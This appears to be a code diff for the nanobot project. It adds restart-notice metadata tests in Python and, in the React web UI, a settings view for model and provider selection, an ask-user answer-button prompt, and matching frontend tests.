@ -16,6 +16,7 @@ from nanobot.utils.restart import (
|
||||
def test_set_and_consume_restart_notice_env_roundtrip(monkeypatch):
|
||||
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHANNEL", raising=False)
|
||||
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHAT_ID", raising=False)
|
||||
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_METADATA", raising=False)
|
||||
monkeypatch.delenv("NANOBOT_RESTART_STARTED_AT", raising=False)
|
||||
|
||||
set_restart_notice_to_env(channel="feishu", chat_id="oc_123")
|
||||
@ -25,14 +26,42 @@ def test_set_and_consume_restart_notice_env_roundtrip(monkeypatch):
|
||||
assert notice.channel == "feishu"
|
||||
assert notice.chat_id == "oc_123"
|
||||
assert notice.started_at_raw
|
||||
assert notice.metadata == {}
|
||||
|
||||
# Consumed values should be cleared from env.
|
||||
assert consume_restart_notice_from_env() is None
|
||||
assert "NANOBOT_RESTART_NOTIFY_CHANNEL" not in os.environ
|
||||
assert "NANOBOT_RESTART_NOTIFY_CHAT_ID" not in os.environ
|
||||
assert "NANOBOT_RESTART_NOTIFY_METADATA" not in os.environ
|
||||
assert "NANOBOT_RESTART_STARTED_AT" not in os.environ
|
||||
|
||||
|
||||
def test_restart_notice_preserves_metadata_across_env(monkeypatch):
|
||||
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHANNEL", raising=False)
|
||||
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHAT_ID", raising=False)
|
||||
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_METADATA", raising=False)
|
||||
monkeypatch.delenv("NANOBOT_RESTART_STARTED_AT", raising=False)
|
||||
|
||||
set_restart_notice_to_env(
|
||||
channel="slack",
|
||||
chat_id="C123",
|
||||
metadata={"slack": {"thread_ts": "1700.42", "channel_type": "channel"}},
|
||||
)
|
||||
|
||||
notice = consume_restart_notice_from_env()
|
||||
assert notice is not None
|
||||
assert notice.metadata == {
|
||||
"slack": {"thread_ts": "1700.42", "channel_type": "channel"}
|
||||
}
|
||||
assert "NANOBOT_RESTART_NOTIFY_METADATA" not in os.environ
|
||||
|
||||
|
||||
def test_restart_notice_clears_stale_metadata(monkeypatch):
|
||||
monkeypatch.setenv("NANOBOT_RESTART_NOTIFY_METADATA", '{"stale": true}')
|
||||
set_restart_notice_to_env(channel="cli", chat_id="direct")
|
||||
assert "NANOBOT_RESTART_NOTIFY_METADATA" not in os.environ
|
||||
|
||||
|
||||
def test_format_restart_completed_message_with_elapsed(monkeypatch):
|
||||
monkeypatch.setattr("nanobot.utils.restart.time.time", lambda: 102.0)
|
||||
assert format_restart_completed_message("100.0") == "Restart completed in 2.0s."
|
||||
|
||||
@ -2,6 +2,7 @@ import { useCallback, useEffect, useMemo, useRef, useState } from "react";
|
||||
import { useTranslation } from "react-i18next";
|
||||
import { DeleteConfirm } from "@/components/DeleteConfirm";
|
||||
import { Sidebar } from "@/components/Sidebar";
|
||||
import { SettingsView } from "@/components/settings/SettingsView";
|
||||
import { ThreadShell } from "@/components/thread/ThreadShell";
|
||||
import { Sheet, SheetContent } from "@/components/ui/sheet";
|
||||
import { preloadMarkdownText } from "@/components/MarkdownText";
|
||||
@ -25,6 +26,7 @@ type BootState =
|
||||
|
||||
const SIDEBAR_STORAGE_KEY = "nanobot-webui.sidebar";
|
||||
const SIDEBAR_WIDTH = 279;
|
||||
type ShellView = "chat" | "settings";
|
||||
|
||||
function readSidebarOpen(): boolean {
|
||||
if (typeof window === "undefined") return true;
|
||||
@ -136,22 +138,29 @@ export default function App() {
|
||||
);
|
||||
}
|
||||
|
||||
const handleModelNameChange = (modelName: string | null) => {
|
||||
setState((current) =>
|
||||
current.status === "ready" ? { ...current, modelName } : current,
|
||||
);
|
||||
};
|
||||
|
||||
return (
|
||||
<ClientProvider
|
||||
client={state.client}
|
||||
token={state.token}
|
||||
modelName={state.modelName}
|
||||
>
|
||||
<Shell />
|
||||
<Shell onModelNameChange={handleModelNameChange} />
|
||||
</ClientProvider>
|
||||
);
|
||||
}
|
||||
|
||||
function Shell() {
|
||||
function Shell({ onModelNameChange }: { onModelNameChange: (modelName: string | null) => void }) {
|
||||
const { t, i18n } = useTranslation();
|
||||
const { theme, toggle } = useTheme();
|
||||
const { sessions, loading, refresh, createChat, deleteChat } = useSessions();
|
||||
const [activeKey, setActiveKey] = useState<string | null>(null);
|
||||
const [view, setView] = useState<ShellView>("chat");
|
||||
const [desktopSidebarOpen, setDesktopSidebarOpen] =
|
||||
useState<boolean>(readSidebarOpen);
|
||||
const [mobileSidebarOpen, setMobileSidebarOpen] = useState(false);
|
||||
@ -208,6 +217,7 @@ function Shell() {
|
||||
try {
|
||||
const chatId = await createChat();
|
||||
setActiveKey(`websocket:${chatId}`);
|
||||
setView("chat");
|
||||
setMobileSidebarOpen(false);
|
||||
return chatId;
|
||||
} catch (e) {
|
||||
@ -219,6 +229,7 @@ function Shell() {
|
||||
const onSelectChat = useCallback(
|
||||
(key: string) => {
|
||||
setActiveKey(key);
|
||||
setView("chat");
|
||||
setMobileSidebarOpen(false);
|
||||
},
|
||||
[],
|
||||
@ -266,6 +277,11 @@ function Shell() {
|
||||
onRefresh: () => void refresh(),
|
||||
onRequestDelete: (key: string, label: string) =>
|
||||
setPendingDelete({ key, label }),
|
||||
activeView: view,
|
||||
onOpenSettings: () => {
|
||||
setView("settings" as const);
|
||||
setMobileSidebarOpen(false);
|
||||
},
|
||||
};
|
||||
|
||||
return (
|
||||
@ -303,14 +319,23 @@ function Shell() {
|
||||
</Sheet>
|
||||
|
||||
<main className="flex h-full min-w-0 flex-1 flex-col">
|
||||
<ThreadShell
|
||||
session={activeSession}
|
||||
title={headerTitle}
|
||||
onToggleSidebar={toggleSidebar}
|
||||
onGoHome={() => setActiveKey(null)}
|
||||
onNewChat={onNewChat}
|
||||
hideSidebarToggleOnDesktop={desktopSidebarOpen}
|
||||
/>
|
||||
{view === "settings" ? (
|
||||
<SettingsView
|
||||
theme={theme}
|
||||
onToggleTheme={toggle}
|
||||
onBackToChat={() => setView("chat")}
|
||||
onModelNameChange={onModelNameChange}
|
||||
/>
|
||||
) : (
|
||||
<ThreadShell
|
||||
session={activeSession}
|
||||
title={headerTitle}
|
||||
onToggleSidebar={toggleSidebar}
|
||||
onGoHome={() => setActiveKey(null)}
|
||||
onNewChat={onNewChat}
|
||||
hideSidebarToggleOnDesktop={desktopSidebarOpen}
|
||||
/>
|
||||
)}
|
||||
</main>
|
||||
|
||||
<DeleteConfirm
|
||||
|
||||
@ -1,9 +1,8 @@
|
||||
import { Moon, PanelLeftClose, Plus, RefreshCcw, Sun } from "lucide-react";
|
||||
import { Moon, PanelLeftClose, RefreshCcw, Settings, SquarePen, Sun } from "lucide-react";
|
||||
import { useTranslation } from "react-i18next";
|
||||
|
||||
import { ChatList } from "@/components/ChatList";
|
||||
import { ConnectionBadge } from "@/components/ConnectionBadge";
|
||||
import { LanguageSwitcher } from "@/components/LanguageSwitcher";
|
||||
import { Button } from "@/components/ui/button";
|
||||
import { Separator } from "@/components/ui/separator";
|
||||
import type { ChatSummary } from "@/lib/types";
|
||||
@ -19,48 +18,60 @@ interface SidebarProps {
|
||||
onRefresh: () => void;
|
||||
onRequestDelete: (key: string, label: string) => void;
|
||||
onCollapse: () => void;
|
||||
activeView?: "chat" | "settings";
|
||||
onOpenSettings: () => void;
|
||||
}
|
||||
|
||||
export function Sidebar(props: SidebarProps) {
|
||||
const { t } = useTranslation();
|
||||
return (
|
||||
<aside className="flex h-full w-full flex-col border-r border-sidebar-border/70 bg-sidebar text-sidebar-foreground">
|
||||
<div className="flex items-center justify-between px-2 py-2">
|
||||
<Button
|
||||
variant="ghost"
|
||||
size="icon"
|
||||
aria-label={t("sidebar.collapse")}
|
||||
onClick={props.onCollapse}
|
||||
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
|
||||
>
|
||||
<PanelLeftClose className="h-3.5 w-3.5" />
|
||||
</Button>
|
||||
<Button
|
||||
variant="ghost"
|
||||
size="icon"
|
||||
aria-label={t("sidebar.toggleTheme")}
|
||||
onClick={props.onToggleTheme}
|
||||
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
|
||||
>
|
||||
{props.theme === "dark" ? (
|
||||
<Sun className="h-3.5 w-3.5" />
|
||||
) : (
|
||||
<Moon className="h-3.5 w-3.5" />
|
||||
)}
|
||||
</Button>
|
||||
<div className="flex items-center justify-between px-3 pb-2 pt-3">
|
||||
<picture className="block min-w-0">
|
||||
<source srcSet="/brand/nanobot_logo.webp" type="image/webp" />
|
||||
<img
|
||||
src="/brand/nanobot_logo.png"
|
||||
alt="nanobot"
|
||||
className="h-7 w-auto select-none object-contain"
|
||||
draggable={false}
|
||||
/>
|
||||
</picture>
|
||||
<div className="flex items-center gap-0.5">
|
||||
<Button
|
||||
variant="ghost"
|
||||
size="icon"
|
||||
aria-label={t("sidebar.toggleTheme")}
|
||||
onClick={props.onToggleTheme}
|
||||
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
|
||||
>
|
||||
{props.theme === "dark" ? (
|
||||
<Sun className="h-3.5 w-3.5" />
|
||||
) : (
|
||||
<Moon className="h-3.5 w-3.5" />
|
||||
)}
|
||||
</Button>
|
||||
<Button
|
||||
variant="ghost"
|
||||
size="icon"
|
||||
aria-label={t("sidebar.collapse")}
|
||||
onClick={props.onCollapse}
|
||||
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
|
||||
>
|
||||
<PanelLeftClose className="h-3.5 w-3.5" />
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
<div className="px-2 pb-2.5">
|
||||
<div className="px-2 pb-2">
|
||||
<Button
|
||||
onClick={props.onNewChat}
|
||||
className="h-8.5 w-full justify-start gap-2 rounded-lg border border-sidebar-border/80 bg-card/25 px-3 text-[13px] font-medium text-sidebar-foreground shadow-none hover:bg-sidebar-accent/80"
|
||||
variant="outline"
|
||||
className="h-9 w-full justify-start gap-2 rounded-full px-3 text-[13px] font-medium text-sidebar-foreground/90 hover:bg-sidebar-accent hover:text-sidebar-foreground"
|
||||
variant="ghost"
|
||||
>
|
||||
<Plus className="h-3.5 w-3.5" />
|
||||
<SquarePen className="h-3.5 w-3.5" />
|
||||
{t("sidebar.newChat")}
|
||||
</Button>
|
||||
</div>
|
||||
<Separator className="bg-sidebar-border/70" />
|
||||
<div className="flex items-center justify-between px-2.5 py-2 text-[11px] font-medium text-muted-foreground">
|
||||
<div className="flex items-center justify-between px-3 pb-1.5 pt-2.5 text-[11px] font-medium text-muted-foreground">
|
||||
<span>{t("sidebar.recent")}</span>
|
||||
<Button
|
||||
variant="ghost"
|
||||
@ -81,10 +92,17 @@ export function Sidebar(props: SidebarProps) {
|
||||
onRequestDelete={props.onRequestDelete}
|
||||
/>
|
||||
</div>
|
||||
<Separator className="bg-sidebar-border/70" />
|
||||
<Separator className="bg-sidebar-border/50" />
|
||||
<div className="flex items-center justify-between gap-2 px-2.5 py-2 text-xs">
|
||||
<ConnectionBadge />
|
||||
<LanguageSwitcher />
|
||||
<Button
|
||||
onClick={props.onOpenSettings}
|
||||
className="h-7 gap-1.5 rounded-md px-2 text-[11px] text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
|
||||
variant={props.activeView === "settings" ? "secondary" : "ghost"}
|
||||
>
|
||||
<Settings className="h-3.5 w-3.5" />
|
||||
Settings
|
||||
</Button>
|
||||
</div>
|
||||
</aside>
|
||||
);
|
||||
|
||||
245
webui/src/components/settings/SettingsView.tsx
Normal file
245
webui/src/components/settings/SettingsView.tsx
Normal file
@ -0,0 +1,245 @@
|
||||
import { useCallback, useEffect, useMemo, useState } from "react";
|
||||
import { ChevronLeft, Loader2 } from "lucide-react";
|
||||
|
||||
import { LanguageSwitcher } from "@/components/LanguageSwitcher";
|
||||
import { Button } from "@/components/ui/button";
|
||||
import { Input } from "@/components/ui/input";
|
||||
import { fetchSettings, updateSettings } from "@/lib/api";
|
||||
import { cn } from "@/lib/utils";
|
||||
import { useClient } from "@/providers/ClientProvider";
|
||||
import type { SettingsPayload } from "@/lib/types";
|
||||
|
||||
interface SettingsViewProps {
|
||||
theme: "light" | "dark";
|
||||
onToggleTheme: () => void;
|
||||
onBackToChat: () => void;
|
||||
onModelNameChange: (modelName: string | null) => void;
|
||||
}
|
||||
|
||||
export function SettingsView({
|
||||
onBackToChat,
|
||||
onModelNameChange,
|
||||
}: SettingsViewProps) {
|
||||
const { token } = useClient();
|
||||
const [settings, setSettings] = useState<SettingsPayload | null>(null);
|
||||
const [loading, setLoading] = useState(true);
|
||||
const [saving, setSaving] = useState(false);
|
||||
const [error, setError] = useState<string | null>(null);
|
||||
const [form, setForm] = useState({
|
||||
model: "",
|
||||
provider: "auto",
|
||||
});
|
||||
|
||||
const applyPayload = useCallback((payload: SettingsPayload) => {
|
||||
setSettings(payload);
|
||||
setForm({
|
||||
model: payload.agent.model,
|
||||
provider: payload.agent.provider,
|
||||
});
|
||||
}, []);
|
||||
|
||||
useEffect(() => {
|
||||
let cancelled = false;
|
||||
setLoading(true);
|
||||
fetchSettings(token)
|
||||
.then((payload) => {
|
||||
if (!cancelled) {
|
||||
applyPayload(payload);
|
||||
setError(null);
|
||||
}
|
||||
})
|
||||
.catch((err) => {
|
||||
if (!cancelled) setError((err as Error).message);
|
||||
})
|
||||
.finally(() => {
|
||||
if (!cancelled) setLoading(false);
|
||||
});
|
||||
return () => {
|
||||
cancelled = true;
|
||||
};
|
||||
}, [applyPayload, token]);
|
||||
|
||||
const dirty = useMemo(() => {
|
||||
if (!settings) return false;
|
||||
return (
|
||||
form.model !== settings.agent.model ||
|
||||
form.provider !== settings.agent.provider
|
||||
);
|
||||
}, [form, settings]);
|
||||
|
||||
const save = async () => {
|
||||
if (!dirty || saving) return;
|
||||
setSaving(true);
|
||||
try {
|
||||
const payload = await updateSettings(token, form);
|
||||
applyPayload(payload);
|
||||
onModelNameChange(payload.agent.model || null);
|
||||
setError(null);
|
||||
} catch (err) {
|
||||
setError((err as Error).message);
|
||||
} finally {
|
||||
setSaving(false);
|
||||
}
|
||||
};
|
||||
|
||||
return (
|
||||
<div className="min-h-0 flex-1 overflow-y-auto bg-background">
|
||||
<main className="mx-auto w-full max-w-[1000px] px-6 py-6">
|
||||
<button
|
||||
type="button"
|
||||
onClick={onBackToChat}
|
||||
className="mb-4 inline-flex items-center gap-1.5 text-xs font-medium text-muted-foreground hover:text-foreground"
|
||||
>
|
||||
<ChevronLeft className="h-3.5 w-3.5" />
|
||||
Back to chat
|
||||
</button>
|
||||
|
||||
<h1 className="mb-6 text-base font-semibold tracking-tight">General</h1>
|
||||
|
||||
{loading ? (
|
||||
<div className="flex h-48 items-center justify-center text-sm text-muted-foreground">
|
||||
<Loader2 className="mr-2 h-4 w-4 animate-spin" />
|
||||
Loading settings...
|
||||
</div>
|
||||
) : error ? (
|
||||
<SettingsGroup>
|
||||
<SettingsRow title="Could not load settings">
|
||||
<span className="max-w-[520px] text-sm text-muted-foreground">{error}</span>
|
||||
</SettingsRow>
|
||||
</SettingsGroup>
|
||||
) : settings ? (
|
||||
<SettingsSection
|
||||
form={form}
|
||||
setForm={setForm}
|
||||
settings={settings}
|
||||
dirty={dirty}
|
||||
saving={saving}
|
||||
onSave={save}
|
||||
/>
|
||||
) : null}
|
||||
</main>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
function SettingsSection({
|
||||
form,
|
||||
setForm,
|
||||
settings,
|
||||
dirty,
|
||||
saving,
|
||||
onSave,
|
||||
}: {
|
||||
form: {
|
||||
model: string;
|
||||
provider: string;
|
||||
};
|
||||
setForm: React.Dispatch<React.SetStateAction<{
|
||||
model: string;
|
||||
provider: string;
|
||||
}>>;
|
||||
settings: SettingsPayload;
|
||||
dirty: boolean;
|
||||
saving: boolean;
|
||||
onSave: () => void;
|
||||
}) {
|
||||
return (
|
||||
<div className="space-y-7">
|
||||
<section>
|
||||
<h2 className="mb-2 px-2 text-xs font-medium text-muted-foreground">AI</h2>
|
||||
<SettingsGroup>
|
||||
<SettingsRow title="Provider">
|
||||
<select
|
||||
value={form.provider}
|
||||
onChange={(event) => setForm((prev) => ({ ...prev, provider: event.target.value }))}
|
||||
className={cn(
|
||||
"h-8 w-[210px] rounded-md border border-input bg-background px-2 text-sm",
|
||||
"outline-none transition-colors hover:bg-accent focus-visible:ring-2 focus-visible:ring-ring",
|
||||
)}
|
||||
>
|
||||
{settings.providers.map((provider) => (
|
||||
<option key={provider.name} value={provider.name}>
|
||||
{provider.label}
|
||||
</option>
|
||||
))}
|
||||
</select>
|
||||
</SettingsRow>
|
||||
|
||||
<SettingsRow title="Model">
|
||||
<Input
|
||||
value={form.model}
|
||||
onChange={(event) => setForm((prev) => ({ ...prev, model: event.target.value }))}
|
||||
className="h-8 w-[280px]"
|
||||
/>
|
||||
</SettingsRow>
|
||||
|
||||
{(dirty || saving || settings.requires_restart) ? (
|
||||
<SettingsFooter
|
||||
dirty={dirty}
|
||||
saving={saving}
|
||||
saved={settings.requires_restart && !dirty}
|
||||
onSave={onSave}
|
||||
/>
|
||||
) : null}
|
||||
</SettingsGroup>
|
||||
</section>
|
||||
|
||||
<section>
|
||||
<h2 className="mb-2 px-2 text-xs font-medium text-muted-foreground">Interface</h2>
|
||||
<SettingsGroup>
|
||||
<SettingsRow title="Language">
|
||||
<LanguageSwitcher />
|
||||
</SettingsRow>
|
||||
</SettingsGroup>
|
||||
</section>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
function SettingsGroup({ children }: { children: React.ReactNode }) {
|
||||
return (
|
||||
<div className="overflow-hidden rounded-xl border border-border/60 bg-card/80">
|
||||
<div className="divide-y divide-border/50">{children}</div>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
function SettingsRow({
|
||||
title,
|
||||
children,
|
||||
}: {
|
||||
title: string;
|
||||
children?: React.ReactNode;
|
||||
}) {
|
||||
return (
|
||||
<div className="flex min-h-[52px] flex-col gap-3 px-3 py-2.5 sm:flex-row sm:items-center sm:justify-between">
|
||||
<div className="min-w-0">
|
||||
<div className="text-sm font-medium leading-5">{title}</div>
|
||||
</div>
|
||||
{children ? <div className="shrink-0 sm:ml-6">{children}</div> : null}
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
function SettingsFooter({
|
||||
dirty,
|
||||
saving,
|
||||
saved,
|
||||
onSave,
|
||||
}: {
|
||||
dirty: boolean;
|
||||
saving: boolean;
|
||||
saved: boolean;
|
||||
onSave: () => void;
|
||||
}) {
|
||||
return (
|
||||
<div className="flex min-h-[52px] items-center justify-between gap-4 px-3 py-2.5">
|
||||
<div className="text-sm text-muted-foreground">
|
||||
{saved ? "Saved. Restart nanobot to apply." : "Unsaved changes."}
|
||||
</div>
|
||||
<Button size="sm" variant="outline" onClick={onSave} disabled={!dirty || saving}>
|
||||
{saving ? "Saving" : "Save"}
|
||||
</Button>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
108
webui/src/components/thread/AskUserPrompt.tsx
Normal file
108
webui/src/components/thread/AskUserPrompt.tsx
Normal file
@ -0,0 +1,108 @@
|
||||
import { useCallback, useEffect, useRef, useState } from "react";
|
||||
import { MessageSquareText } from "lucide-react";
|
||||
|
||||
import { Button } from "@/components/ui/button";
|
||||
import { cn } from "@/lib/utils";
|
||||
|
||||
interface AskUserPromptProps {
|
||||
question: string;
|
||||
buttons: string[][];
|
||||
onAnswer: (answer: string) => void;
|
||||
}
|
||||
|
||||
export function AskUserPrompt({
|
||||
question,
|
||||
buttons,
|
||||
onAnswer,
|
||||
}: AskUserPromptProps) {
|
||||
const [customOpen, setCustomOpen] = useState(false);
|
||||
const [custom, setCustom] = useState("");
|
||||
const inputRef = useRef<HTMLTextAreaElement>(null);
|
||||
const options = buttons.flat().filter(Boolean);
|
||||
|
||||
useEffect(() => {
|
||||
if (customOpen) {
|
||||
inputRef.current?.focus();
|
||||
}
|
||||
}, [customOpen]);
|
||||
|
||||
const submitCustom = useCallback(() => {
|
||||
const answer = custom.trim();
|
||||
if (!answer) return;
|
||||
onAnswer(answer);
|
||||
setCustom("");
|
||||
setCustomOpen(false);
|
||||
}, [custom, onAnswer]);
|
||||
|
||||
if (options.length === 0) return null;
|
||||
|
||||
return (
|
||||
<div
|
||||
className={cn(
|
||||
"mx-auto mb-2 w-full max-w-[49.5rem] rounded-[16px] border border-primary/30",
|
||||
"bg-card/95 p-3 shadow-sm backdrop-blur",
|
||||
)}
|
||||
role="group"
|
||||
aria-label="Question"
|
||||
>
|
||||
<div className="mb-2 flex items-start gap-2">
|
||||
<div className="mt-0.5 rounded-full bg-primary/10 p-1.5 text-primary">
|
||||
<MessageSquareText className="h-3.5 w-3.5" aria-hidden />
|
||||
</div>
|
||||
<p className="min-w-0 flex-1 text-sm font-medium leading-5 text-foreground">
|
||||
{question}
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<div className="grid gap-1.5 sm:grid-cols-2">
|
||||
{options.map((option) => (
|
||||
<Button
|
||||
key={option}
|
||||
type="button"
|
||||
variant="outline"
|
||||
size="sm"
|
||||
onClick={() => onAnswer(option)}
|
||||
className="justify-start rounded-[10px] px-3 text-left"
|
||||
>
|
||||
<span className="truncate">{option}</span>
|
||||
</Button>
|
||||
))}
|
||||
<Button
|
||||
type="button"
|
||||
variant="ghost"
|
||||
size="sm"
|
||||
onClick={() => setCustomOpen((open) => !open)}
|
||||
className="justify-start rounded-[10px] px-3 text-muted-foreground"
|
||||
>
|
||||
Other...
|
||||
</Button>
|
||||
</div>
|
||||
|
||||
{customOpen ? (
|
||||
<div className="mt-2 flex gap-2">
|
||||
<textarea
|
||||
ref={inputRef}
|
||||
value={custom}
|
||||
onChange={(event) => setCustom(event.target.value)}
|
||||
onKeyDown={(event) => {
|
||||
if (event.key === "Enter" && !event.shiftKey && !event.nativeEvent.isComposing) {
|
||||
event.preventDefault();
|
||||
submitCustom();
|
||||
}
|
||||
}}
|
||||
rows={1}
|
||||
placeholder="Type your own answer..."
|
||||
className={cn(
|
||||
"min-h-9 flex-1 resize-none rounded-[10px] border border-border/70 bg-background",
|
||||
"px-3 py-2 text-sm leading-5 outline-none placeholder:text-muted-foreground",
|
||||
"focus-visible:ring-1 focus-visible:ring-primary/40",
|
||||
)}
|
||||
/>
|
||||
<Button type="button" size="sm" onClick={submitCustom} disabled={!custom.trim()}>
|
||||
Send
|
||||
</Button>
|
||||
</div>
|
||||
) : null}
|
||||
</div>
|
||||
);
|
||||
}
|
||||
@ -1,6 +1,7 @@
|
||||
import { useCallback, useEffect, useMemo, useRef, useState } from "react";
|
||||
import { useTranslation } from "react-i18next";
|
||||
|
||||
import { AskUserPrompt } from "@/components/thread/AskUserPrompt";
|
||||
import { ThreadComposer } from "@/components/thread/ThreadComposer";
|
||||
import { ThreadHeader } from "@/components/thread/ThreadHeader";
|
||||
import { StreamErrorNotice } from "@/components/thread/StreamErrorNotice";
|
||||
@ -57,6 +58,21 @@ export function ThreadShell({
|
||||
dismissStreamError,
|
||||
} = useNanobotStream(chatId, initial);
|
||||
const showHeroComposer = messages.length === 0 && !loading;
|
||||
const pendingAsk = useMemo(() => {
|
||||
for (let index = messages.length - 1; index >= 0; index -= 1) {
|
||||
const message = messages[index];
|
||||
if (message.kind === "trace") continue;
|
||||
if (message.role === "user") return null;
|
||||
if (message.role === "assistant" && message.buttons?.some((row) => row.length > 0)) {
|
||||
return {
|
||||
question: message.content,
|
||||
buttons: message.buttons,
|
||||
};
|
||||
}
|
||||
if (message.role === "assistant") return null;
|
||||
}
|
||||
return null;
|
||||
}, [messages]);
|
||||
|
||||
useEffect(() => {
|
||||
if (!chatId || loading) return;
|
||||
@ -152,6 +168,13 @@ export function ThreadShell({
|
||||
onDismiss={dismissStreamError}
|
||||
/>
|
||||
) : null}
|
||||
{pendingAsk ? (
|
||||
<AskUserPrompt
|
||||
question={pendingAsk.question}
|
||||
buttons={pendingAsk.buttons}
|
||||
onAnswer={send}
|
||||
/>
|
||||
) : null}
|
||||
{session ? (
|
||||
<ThreadComposer
|
||||
onSend={send}
|
||||
|
||||
@ -160,13 +160,15 @@ export function useNanobotStream(
|
||||
setIsStreaming(false);
|
||||
setMessages((prev) => {
|
||||
const filtered = activeId ? prev.filter((m) => m.id !== activeId) : prev;
|
||||
const content = ev.buttons?.length ? (ev.button_prompt ?? ev.text) : ev.text;
|
||||
return [
|
||||
...filtered,
|
||||
{
|
||||
id: crypto.randomUUID(),
|
||||
role: "assistant",
|
||||
content: ev.text,
|
||||
content,
|
||||
createdAt: Date.now(),
|
||||
...(ev.buttons && ev.buttons.length > 0 ? { buttons: ev.buttons } : {}),
|
||||
...(media && media.length > 0 ? { media } : {}),
|
||||
},
|
||||
];
|
||||
|
||||
@ -1,4 +1,4 @@
|
||||
import type { ChatSummary } from "./types";
|
||||
import type { ChatSummary, SettingsPayload, SettingsUpdate } from "./types";
|
||||
|
||||
export class ApiError extends Error {
|
||||
status: number;
|
||||
@ -104,3 +104,21 @@ export async function deleteSession(
|
||||
);
|
||||
return body.deleted;
|
||||
}
|
||||
|
||||
export async function fetchSettings(
|
||||
token: string,
|
||||
base: string = "",
|
||||
): Promise<SettingsPayload> {
|
||||
return request<SettingsPayload>(`${base}/api/settings`, token);
|
||||
}
|
||||
|
||||
export async function updateSettings(
|
||||
token: string,
|
||||
update: SettingsUpdate,
|
||||
base: string = "",
|
||||
): Promise<SettingsPayload> {
|
||||
const query = new URLSearchParams();
|
||||
if (update.model !== undefined) query.set("model", update.model);
|
||||
if (update.provider !== undefined) query.set("provider", update.provider);
|
||||
return request<SettingsPayload>(`${base}/api/settings/update?${query}`, token);
|
||||
}
|
||||
|
||||
@ -44,6 +44,8 @@ export interface UIMessage {
|
||||
images?: UIImage[];
|
||||
/** Signed or local UI-renderable media attachments. */
|
||||
media?: UIMediaAttachment[];
|
||||
/** Optional answer choices for a pending ask_user question. */
|
||||
buttons?: string[][];
|
||||
}
|
||||
|
||||
export interface ChatSummary {
|
||||
@ -64,6 +66,28 @@ export interface BootstrapResponse {
|
||||
model_name?: string | null;
|
||||
}
|
||||
|
||||
export interface SettingsPayload {
|
||||
agent: {
|
||||
model: string;
|
||||
provider: string;
|
||||
resolved_provider: string | null;
|
||||
has_api_key: boolean;
|
||||
};
|
||||
providers: Array<{
|
||||
name: string;
|
||||
label: string;
|
||||
}>;
|
||||
runtime: {
|
||||
config_path: string;
|
||||
};
|
||||
requires_restart: boolean;
|
||||
}
|
||||
|
||||
export interface SettingsUpdate {
|
||||
model?: string;
|
||||
provider?: string;
|
||||
}
|
||||
|
||||
export type ConnectionStatus =
|
||||
| "idle"
|
||||
| "connecting"
|
||||
@ -82,6 +106,9 @@ export type InboundEvent =
|
||||
reply_to?: string;
|
||||
media?: string[];
|
||||
media_urls?: Array<{ url: string; name?: string }>;
|
||||
buttons?: string[][];
|
||||
/** Original prompt before the websocket text fallback appends buttons. */
|
||||
button_prompt?: string;
|
||||
/** Present when the frame is an agent breadcrumb (e.g. tool hint,
|
||||
* generic progress line) rather than a conversational reply. */
|
||||
kind?: "tool_hint" | "progress";
|
||||
|
||||
@ -1,6 +1,6 @@
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
|
||||
import { deleteSession, fetchSessionMessages } from "@/lib/api";
|
||||
import { deleteSession, fetchSessionMessages, updateSettings } from "@/lib/api";
|
||||
|
||||
describe("webui API helpers", () => {
|
||||
beforeEach(() => {
|
||||
@ -34,4 +34,18 @@ describe("webui API helpers", () => {
|
||||
}),
|
||||
);
|
||||
});
|
||||
|
||||
it("serializes settings updates as a narrow query string", async () => {
|
||||
await updateSettings("tok", {
|
||||
model: "openrouter/test",
|
||||
provider: "openrouter",
|
||||
});
|
||||
|
||||
expect(fetch).toHaveBeenCalledWith(
|
||||
"/api/settings/update?model=openrouter%2Ftest&provider=openrouter",
|
||||
expect.objectContaining({
|
||||
headers: { Authorization: "Bearer tok" },
|
||||
}),
|
||||
);
|
||||
});
|
||||
});
|
||||
|
||||
@ -146,4 +146,44 @@ describe("App layout", () => {
|
||||
expect(screen.queryByText('Delete “First chat”?')).not.toBeInTheDocument();
|
||||
expect(document.body.style.pointerEvents).not.toBe("none");
|
||||
}, 15_000);
|
||||
|
||||
it("opens the Cursor-style settings view from the sidebar", async () => {
|
||||
vi.stubGlobal(
|
||||
"fetch",
|
||||
vi.fn(async (input: RequestInfo | URL) => {
|
||||
if (String(input).includes("/api/settings")) {
|
||||
return {
|
||||
ok: true,
|
||||
status: 200,
|
||||
json: async () => ({
|
||||
agent: {
|
||||
model: "openai/gpt-4o",
|
||||
provider: "auto",
|
||||
resolved_provider: "openai",
|
||||
has_api_key: true,
|
||||
},
|
||||
providers: [
|
||||
{ name: "auto", label: "Auto" },
|
||||
{ name: "openai", label: "OpenAI" },
|
||||
],
|
||||
runtime: {
|
||||
config_path: "/tmp/config.json",
|
||||
},
|
||||
requires_restart: false,
|
||||
}),
|
||||
};
|
||||
}
|
||||
return { ok: false, status: 404, json: async () => ({}) };
|
||||
}),
|
||||
);
|
||||
|
||||
render(<App />);
|
||||
|
||||
await waitFor(() => expect(connectSpy).toHaveBeenCalled());
|
||||
fireEvent.click(screen.getByRole("button", { name: "Settings" }));
|
||||
|
||||
expect(await screen.findByRole("heading", { name: "General" })).toBeInTheDocument();
|
||||
expect(screen.getByText("AI")).toBeInTheDocument();
|
||||
expect(screen.getByDisplayValue("openai/gpt-4o")).toBeInTheDocument();
|
||||
});
|
